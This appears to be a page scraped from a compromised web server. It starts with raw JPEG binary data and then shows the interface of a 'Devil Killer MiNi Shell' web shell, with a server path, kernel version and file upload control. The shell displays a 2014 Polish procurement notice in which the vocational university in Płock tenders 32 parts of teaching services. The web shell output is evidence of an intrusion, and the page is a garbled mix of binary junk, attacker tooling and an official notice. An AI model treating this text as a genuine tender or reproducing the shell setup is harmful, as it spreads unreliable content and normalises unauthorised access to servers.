JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141002/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141002/326922-N-2014.html

<p class="kh_header"><b>Płock: Świadczenie usług edukacyjnych osób dorosłych na poziomie akademickim w Państwowej Wyższej Szkole Zawodowej w Płocku</b><br>
<b>Numer ogłoszenia: 326922 - 2014; data zamieszczenia: 02.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa w Płocku , Pl. Dąbrowskiego 2, 09-402 Płock, woj. mazowieckie, tel. 24 3665400, faks 24 3665421.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwszplock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług edukacyjnych osób dorosłych na poziomie akademickim w Państwowej Wyższej Szkole Zawodowej w Płocku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług edukacyjnych osób dorosłych na poziomie akademickim w Państwowej Wyższej Szkole Zawodowej w Płocku.
Studium Praktycznej Nauki Języków Obcych
Kierunek studiów - Filologia/Ekonomia/Pedagogika
Specjalność - Filologia angielska/Finanse i rachunkowość Przedsiębiorstw, Finanse Publiczne i Administracja (grupa łączona) 
Część 1
Przeprowadzenie 180 godzin zajęć przedmiotu Lektorat języka rosyjskiego w formie:
-ćwiczeń (60 godzin), zakończonych egzaminem końcowym B2 - III rok studiów/ V semestr - studia stacjonarne
-ćwiczeń (30 godzin), zakończonych zaliczeniem z oceną - II rok studiów/ III semestr - studia stacjonarne
-ćwiczeń (30 godzin), zakończonych zaliczeniem z oceną - II rok studiów/ IV semestr - studia stacjonarne
-ćwiczeń (30 godzin), zakończonych zaliczeniem z oceną - I rok studiów/ I semestr - studia stacjonarne
-ćwiczeń (30 godzin), zakończonych zaliczeniem z oceną - I rok studiów/ II semestr - studia stacjonarne
Instytut Nauk o Zdrowiu
Kierunek studiów - Pielęgniarstwo
Część 2
Przeprowadzenie 72 godzin zajęć przedmiotu Podstawy Pielęgniarstwa w formie ćwiczeń, zakończonych zaliczeniem, I rok studiów/ I semestr, studia stacjonarne
Część 3
Przeprowadzenie 51 godzin zajęć przedmiotu Fizjologia w formie:
-ćwiczeń (15 godzin), zakończonych zaliczeniem - I rok studiów/ I semestr - studia stacjonarne.
-ćwiczeń (36 godzin), zakończonych zaliczeniem - I rok studiów/ II semestr - studia stacjonarne.
Część 4
Przeprowadzenie  14 godzin zajęć przedmiotu Radiologia w formie wykładów, zakończonych zaliczeniem z oceną, I rok studiów/semestr II - studia stacjonarne.
Część 5
Przeprowadzenie  9 godzin zajęć przedmiotu Radiologia w formie wykładów, zakończonych zaliczeniem z oceną, I rok studiów/semestr II - studia stacjonarne.
Część 6
Przeprowadzenie 15 godzin zajęć przedmiotu Psychologia w formie wykładów zakończonych zaliczeniem z oceną, I rok studiów/semestr I - studia stacjonarne.
Część 7
Przeprowadzenie 120 godzin zajęć przedmiotu Psychologia w formie ćwiczeń zakończonych zaliczeniem, I rok studiów/semestr I - studia stacjonarne.
Część 8
Przeprowadzenie 39 godzin zajęć przedmiotu Promocja zdrowia psychicznego w formie ćwiczeń, zakończonych zaliczeniem z oceną, I rok studiów/semestr I - studia stacjonarne.
Część 9
Przeprowadzenie 80 godzin zajęć przedmiotu Badanie fizykalne w formie ćwiczeń zakończonych zaliczeniem z oceną, II rok studiów/semestr III - studia stacjonarne.
Część 10
Przeprowadzenie 20 godzin zajęć przedmiotu Pediatria w formie wykładów zakończonych zaliczeniem z oceną, II rok studiów/semestr III - studia stacjonarne.
Część 11
Przeprowadzenie 40 godzin zajęć przedmiotu Pielęgnowanie niepełnosprawnych w formie wykładów, zakończonych egzaminem - III rok studiów/ V semestr - studia stacjonarne
Część 12
Przeprowadzenie 41 godzin zajęć przedmiotu Psychiatria w formie:
-wykładów (26 godzin), zakończonych zaliczeniem z ocenę, III rok studiów/ V semestr - studia stacjonarne
-wykładów (15 godzin), zakończonych zaliczeniem z ocenę, II rok studiów/ III semestr - studia niestacjonarne
Kierunek studiów - Kosmetologia
Część 13
Przeprowadzenie 40 godzin zajęć przedmiotu Ochrona własności intelektualnej w formie:
-wykładów (10 godzin), zakończonych zaliczeniem z oceną, I rok studiów/semestr I - studia stacjonarne
-ćwiczeń (30 godzin), zakończonych zaliczeniem z oceną, I rok studiów/semestr I - studia stacjonarne
Część 14
Przeprowadzenie 90 godzin zajęć przedmiotu Psychologia w formie:
-wykładów (15 godzin) zakończonych zaliczeniem z oceną, I rok studiów/semestr I - studia stacjonarne
-ćwiczeń (75 godzin) zakończonych zaliczeniem z oceną, I rok studiów/semestr I - studia stacjonarne.
Część 15
Przeprowadzenie 225 godzin zajęć przedmiotu Biochemia w formie:
-wykładów (15 godzin) zakończonych zaliczeniem z oceną, I rok studiów/semestr I - studia stacjonarne
-ćwiczeń (90 godzin) zakończonych zaliczeniem z oceną, I rok studiów/semestr I - studia stacjonarne.
-ćwiczeń (120 godzin) zakończonych egzaminem, I rok studiów/semestr II - studia stacjonarne.
Część 16
Przeprowadzenie 120 godzin zajęć przedmiotu Nowoczesne metody aktywności ruchowej/Modelowanie sylwetki w formie:
-wykładów (15 godzin), zakończonych zaliczeniem z oceną - II rok studiów/ III semestr - studia stacjonarne
-ćwiczeń (105 godzin), zakończonych zaliczeniem z oceną - II rok studiów/ III semestr - studia stacjonarne
Część 17
Przeprowadzenie 30 godzin zajęć przedmiotu Promocja zdrowia psychicznego w formie wykładów, zakończonych zaliczeniem z oceną, I rok studiów, semestr I - studia stacjonarne.
Instytut Nauk Humanistycznych i Społecznych
Kierunek studiów - Pedagogika
Specjalność - Pedagogika sądowa z mediacją
Część 18
Przeprowadzenie 30 godzin zajęć przedmiotu   psychologia i pedagogika sądowa w formie wykładów, zakończonych egzaminem, pierwszy rok studiów, semestr I - studia stacjonarne
Część 19
Przeprowadzenie 60 godzin (30 godzin x 2 grupy)  zajęć przedmiotu   psychologia i pedagogika sądowa w formie konwersatorium, zakończonych zaliczeniem z oceną, pierwszy rok studiów, semestr I - studia stacjonarne
Część 20
Przeprowadzenie 30 godzin  zajęć przedmiotu   wybrane problemy prawa rodzinnego, opiekuńczego i karnego w formie wykładów, zakończonych zaliczeniem z oceną, drugi rok studiów, semestr IV - studia stacjonarne
Część 21
Przeprowadzenie 60 godzin (30 godzin x 2 grupy) zajęć przedmiotu   Diagnozowanie i opiniowanie psychopedagogiczne w sprawach rodzinnych, nieletnich i karnych w formie konwersatorium, zakończonych zaliczeniem z oceną, drugi rok studiów, semestr IV - studia stacjonarne
Kierunek studiów - Pedagogika
Specjalność - Pedagogika resocjalizacyjna z profilaktyką społeczną
Część 22
Przeprowadzenie 15 godzin zajęć przedmiotu diagnostyka i programowanie postdiagnoztyczne w resocjalizacji  w formie wykładu, zakończonych zaliczeniem z oceną, drugi rok studiów, semestr III - studia stacjonarne.
Część 23
Przeprowadzenie 30 godzin zajęć przedmiotu pedagogika resocjalizacyjna i penitencjarna w formie wykładu, zakończonych egzaminem, drugi rok studiów, semestr III - studia stacjonarne.
Część 24
Przeprowadzenie 30 godzin zajęć przedmiotu Metodyka oddziaływań profilaktycznych i resocjalizacyjnych  w formie wykładu, zakończonych egzaminem, pierwszy rok studiów, semestr II - studia stacjonarne.
Część 25
Przeprowadzenie 15 godzin zajęć przedmiotu Socjoterapia  w formie wykładu, zakończonych egzaminem, drugi rok studiów, semestr III - studia stacjonarne.
Część 26
Przeprowadzenie 90 godzin zajęć przedmiotu Resocjalizacja w środowisku otwartym i zamkniętym  w formie:
-konwersatorium (60 godzin - 30 godzin x 2 grupy), zakończonych zaliczeniem z oceną, trzeci rok studiów, semestr V - studia stacjonarne
-konwersatorium (30 godzin), zakończonych zaliczeniem z oceną, trzeci rok studiów, semestr V - studia niestacjonarne.
Część 27
Przeprowadzenie 75 godzin zajęć przedmiotu Profilaktyka uzależnień w formie:
-konwersatorium (60 godzin - 30 godzin x 2 grupy), zakończonych zaliczeniem z oceną, drugi rok studiów, semestr III - studia stacjonarne
-konwersatorium (15 godzin), zakończonych zaliczeniem z oceną, trzeci rok studiów, semestr VI - studia niestacjonarne.
Część 28
Przeprowadzenie 15 godzin zajęć przedmiotu Praca resocjalizacyjno-terapeutyczna z osobami uzależnionymi w formie konwersatorium, zakończonych zaliczeniem z oceną, trzeci rok studiów, semestr VI - studia niestacjonarne
Część 29
Przeprowadzenie (60 godzin  30 godzin x 2 grupy) zajęć przedmiotu Resocjalizacja w środowisku otwartym i zamkniętym w formie konwersatorium, zakończonych zaliczeniem z oceną, drugi rok studiów, semestr IV - studia stacjonarne
Kierunek studiów - Pedagogika - studia drugiego stopnia
Specjalność - Pedagogika resocjalizacyjna z socjoterapią
Część 30
Przeprowadzenie 60 godzin zajęć przedmiotu diagnoza i programowanie postdiagnostyczne w resocjalizacji  w formie:
-	wykładu (10 godzin), zakończonych egzaminem, pierwszy rok studiów, semestr II - studia stacjonarne
-	konwersatorium (20 godzin- 2 grupy x 10 godzin), zakończonych egzaminem, pierwszy rok studiów, semestr II - studia stacjonarne
-	wykładu (10 godzin), zakończonych egzaminem, pierwszy rok studiów, semestr II - studia niestacjonarne
-	konwersatorium (20 godzin- 2 grupy x 10 godzin), zakończonych egzaminem, pierwszy rok studiów, semestr II - studia niestacjonarne.
Część 31
Przeprowadzenie (30 godzin  15 godzin x 2 grupy) zajęć przedmiotu Praca terapeutyczna z uzależnionymi w formie konwersatorium, zakończonych zaliczeniem z oceną, pierwszy rok studiów, semestr II - studia stacjonarne
Studium Wychowania Fizycznego i Sportu
Kierunek studiów - Filologia, Ekonomia, Pedagogika, Matematyka, Informatyka, Kosmetologia
Część 32
Przeprowadzenie 105 godzin (3 grupy x 25 godzin, 1 grupa x 30 godzin) zajęć przedmiotu Wychowanie fizyczne w formie ćwiczeń, zakończonych zaliczeniem na ocenę - I rok studiów/ I semestr - studia stacjonarne.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 32.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części 1
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-tytuł zawodowy magistra filologii rosyjskiej
-minimum pięcioletnie doświadczenie zawodowe w uczelni  wyższej w nauczaniu języka  rosyjskiego,
-doświadczenie w przygotowywaniu dokumentacji zgodnej z Krajowymi Ramami Kwalifikacji dla szkolnictwa wyższego,
- łatwość nawiązywania kontaktu z młodzieżą
dla części 2
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-prawo wykonywania zawodu pielęgniarki
- tytuł minimum licencjata pielęgniarstwa
- tytuł minimum mgr zdrowia publicznego
-minimum 5 lat stażu pracy w zawodzie
- specjalizacja z pielęgniarstwa epidemiologicznego.
Publikacje będą mile widziane.
dla części 3
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-prawo wykonywania zawodu lekarza,
-minimum tytuł lekarza,
-minimum 5 lat stażu pracy w zawodzie lekarza,
-doświadczenie dydaktyczne w nauczaniu przedmiotu,
-minimum 3 lata stażu pracy,
Publikacje tematyczne będą mile widziane.
dla części 4
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
- prawo wykonywania zawodu lekarza,
-minimum tytuł lekarza specjalisty w zakresie radiologii
- minimum 5 lat stażu pracy w zawodzie lekarza,
dla części 5
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
- prawo wykonywania zawodu lekarza,
-minimum tytuł lekarza specjalisty w zakresie chirurgii
- minimum 5 lat stażu pracy w zawodzie lekarza,
dla części 6
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
- minimum tytuł naukowy doktora
- minimum tytuł mgr psychologii
- minimum 5 lat stażu pracy
Publikacje tematyczne oraz doświadczenie dydaktyczne w nauczaniu przedmiotu będą mile widziane.
dla części 7
 Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
- prawo wykonywania zawodu pielęgniarki
- tytuł minimum mgr pielęgniarstwa
- czteroletnie szkolenie podyplomowe z zakresu psychoterapii
- minimum 5 lat stażu pracy w zawodzie
-doświadczenie dydaktyczne w nauczaniu przedmiotu
Publikacje tematyczne będą mile widziane.
dla części 8
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
- prawo wykonywania zawodu pielęgniarki
- tytuł minimum mgr pielęgniarstwa
- czteroletnie szkolenie podyplomowe z zakresu psychoterapii.
-minimum 5 lat stażu pracy w zawodzie
- doświadczenie dydaktyczne w nauczaniu przedmiotu
Publikacje tematyczne będą mile widziane.
dla części 9
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
- prawo wykonywania zawodu pielęgniarki
- minimum tytuł mgr pielęgniarstwa
- minimum 5 lat stażu pracy w zawodzie
- specjalizacja w dziedzinie Pielęgniarstwa anestezjologicznego i intensywnej opieki
- staż pracy w systemie ratownictwa medycznego i/lub oddziale intensywnej terapii
- doświadczenie dydaktyczne w realizacji przedmiotu
Publikacje będą mile widziane.
dla części 10
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
- prawo wykonywania zawodu lekarza
-tytuł lekarza specjalisty w dziedzinie pediatrii
- minimum 10 lat stażu pracy w pediatrii
- doświadczenie dydaktyczne w realizacji przedmiotu.
Publikacje tematyczne będą mile widziane.
dla części 11
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-prawo wykonywania zawodu pielęgniarki
-minimum wykształcenie wyższe magisterskie w zakresie pielęgniarstwa
-minimum 5 lat stażu pracy w zawodzie pielęgniarki
-minimum 3 lata stażu pracy w opiece długoterminowej
- kurs kwalifikacyjny dla pielęgniarek środowiskowych/rodzinnych
- doświadczenie dydaktyczne w realizacji przedmiotu
Publikacje tematyczne będą mile widziane.
dla części 12
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-prawo wykonywania zawodu lekarza,
-tytuł lekarza specjalisty w zakresie psychiatrii,
-minimum 5 lat stażu pracy w psychiatrii,
-doświadczenie dydaktyczne w realizacji przedmiotu,
Publikacje tematyczne w zakresie psychiatrii będą mile widziane.
dla części 13
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
- minimum tytuł mgr prawa
- minimum 5 lat stażu pracy w zawodzie prawnika
Publikacje tematyczne będą mile widziane.
dla części 14
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
- minimum tytuł naukowy doktora
- tytuł mgr psychologii
- minimum 5 lat stażu pracy
dla części 15
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
- tytuł naukowy doktora nauk medycznych w zakresie biologii medycznej
- minimum 5 lat stażu pracy; 
- doświadczenie dydaktyczne w nauczaniu przedmiotu;
Publikacje tematyczne będą mile widziane
dla części 16
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
- tytuł mgr fizjoterapii
- tytuł minimum doktora nauk o kulturze fizycznej
-minimum 5 lat stażu pracy w rehabilitacji
Publikacje tematyczne będą mile widziane.
dla części 17
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-prawo wykonywania zawodu pielęgniarki
-tytuł minimum mgr pielęgniarstwa
-czteroletnie szkolenie podyplomowe z zakresu psychoterapii
-minimum 5 lat stażu pracy w zawodzie
-doświadczenie dydaktyczne w nauczaniu przedmiotu
Publikacje tematyczne będą mile widziane.
dla części 18
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-minimum tytuł mgr prawa
- minimum 1 rok udziału w szkoleniach z zakresu prawa, psychologii i psychiatrii sądowej


dla części 19
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-minimum tytuł mgr prawa
- minimum 1 rok udziału w szkoleniach z zakresu prawa, psychologii i psychiatrii sądowej
dla części 20
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-minimum tytuł mgr prawa
- minimum 1 rok udziału w szkoleniach z zakresu prawa, psychologii i psychiatrii sądowej
dla części 21
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-minimum tytuł mgr prawa
- minimum 1 rok udziału w szkoleniach z zakresu prawa, psychologii i psychiatrii sądowej
dla części 22
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-tytuł doktora pedagogiki, specjalności: pedagogika resocjalizacyjna, penitencjarystyka, proksemika
-minimum 5 lat prowadzenia zajęć z zakresu pedagogiki resocjalizacyjnej, diagnostyki resocjalizacyjnej, metodyki wychowania resocjalizacyjnego, patologii, więziennictwa
-minimum 3  publikacje z dziedziny resocjalizacyjnej i penitencjarnej
dla części 23
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-tytuł doktora pedagogiki, specjalności: pedagogika resocjalizacyjna, penitencjarystyka, proksemika
-minimum 5 lat prowadzenia zajęć z zakresu pedagogiki resocjalizacyjnej, diagnostyki resocjalizacyjnej, metodyki wychowania resocjalizacyjnego, patologii, więziennictwa
-minimum 3  publikacje z dziedziny resocjalizacyjnej i penitencjarnej
dla części 24
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-tytuł doktora pedagogiki, specjalności: pedagogika resocjalizacyjna, penitencjarystyka, proksemika
-minimum 5 lat prowadzenia zajęć z zakresu pedagogiki resocjalizacyjnej, diagnostyki resocjalizacyjnej, metodyki wychowania resocjalizacyjnego, patologii, więziennictwa
-minimum 3 publikacje z dziedziny resocjalizacyjnej i penitencjarnej
dla części 25
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-tytuł doktora pedagogiki, specjalności: pedagogika resocjalizacyjna, penitencjarystyka, proksemika
-minimum 5 lat prowadzenia zajęć z zakresu pedagogiki resocjalizacyjnej, diagnostyki resocjalizacyjnej, metodyki wychowania resocjalizacyjnego, patologii, więziennictwa
-minimum 3 publikacje z dziedziny resocjalizacyjnej i penitencjarnej
dla części 26
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-tytuł minimum mgr pedagogiki
- minimum 1 rok doświadczenia w prowadzeniu zajęć z zakresu: resocjalizacja
- ukończone studia podyplomowe/kursy dotyczące profilaktyki uzależnień, negocjacji policyjnych, pracy na rzecz rodziny
-doświadczenie w kierowaniu zespołem wychowawców w zakresie pracy z nieletnimi sprawcami czynów karalnych 
dla części 27
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-tytuł minimum mgr pedagogiki
- minimum 1 rok doświadczenia w prowadzeniu zajęć z zakresu: resocjalizacja
- ukończone studia podyplomowe/kursy dotyczące profilaktyki uzależnień, negocjacji policyjnych, pracy na rzecz rodziny
-doświadczenie w kierowaniu zespołem wychowawców w zakresie pracy z nieletnimi sprawcami czynów karalnych 
dla części 28
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-tytuł minimum mgr z przygotowaniem pedagogicznym
-minimum 5lat doświadczenia w prowadzeniu zajęć dydaktycznych w szkolnictwie wyższym
- udział w konferencjach/szkoleniach z zakresu edukacji przywięziennej/resocjalizacji
- doświadczenie w prowadzeniu zajęć ze słuchaczami szkół przywięziennych
-doświadczenie w pracy ze skazanymi
dla części 29
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-tytuł minimum mgr z przygotowaniem pedagogicznym
-minimum 5lat doświadczenia w prowadzeniu zajęć dydaktycznych w szkolnictwie wyższym
- udział w konferencjach/szkoleniach z zakresu edukacji przywięziennej/resocjalizacji
- doświadczenie w prowadzeniu zajęć ze słuchaczami szkół przywięziennych
-doświadczenie w pracy ze skazanymi
dla części 30
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-tytuł doktora pedagogiki, specjalności: pedagogika resocjalizacyjna, penitencjarystyka, proksemika
-minimum 5 lat prowadzenia zajęć z zakresu pedagogiki resocjalizacyjnej, diagnostyki resocjalizacyjnej, metodyki wychowania resocjalizacyjnego, patologii, więziennictwa
-minimum 3 publikacje z dziedziny resocjalizacyjnej i penitencjarnej
dla części 31
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-tytuł minimum mgr z przygotowaniem pedagogicznym
-minimum 5lat doświadczenia w prowadzeniu zajęć dydaktycznych w szkolnictwie wyższym
- udział w konferencjach/szkoleniach z zakresu edukacji przywięziennej/resocjalizacji
- doświadczenie w prowadzeniu zajęć ze słuchaczami szkół przywięziennych
-doświadczenie w pracy ze skazanymi
dla części 32
Ze złożonych dokumentów i oświadczeń musi wynikać, iż prowadzący zajęcia posiada:
-studia magisterskie jednostopniowe ( 4-letnie) ukończone na Akademii Wychowania Fizycznego   lub dwustopniowe ( I i II stopień ukończone na Akademii Wychowania Fizycznego ) w trybie stacjonarnym
-doświadczenie w prowadzeniu zajęć dydaktycznych  z wychowania fizycznego w szkolnictwie  co najmniej na poziomie ponadgimnazjalnym - minimum 8 lat.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
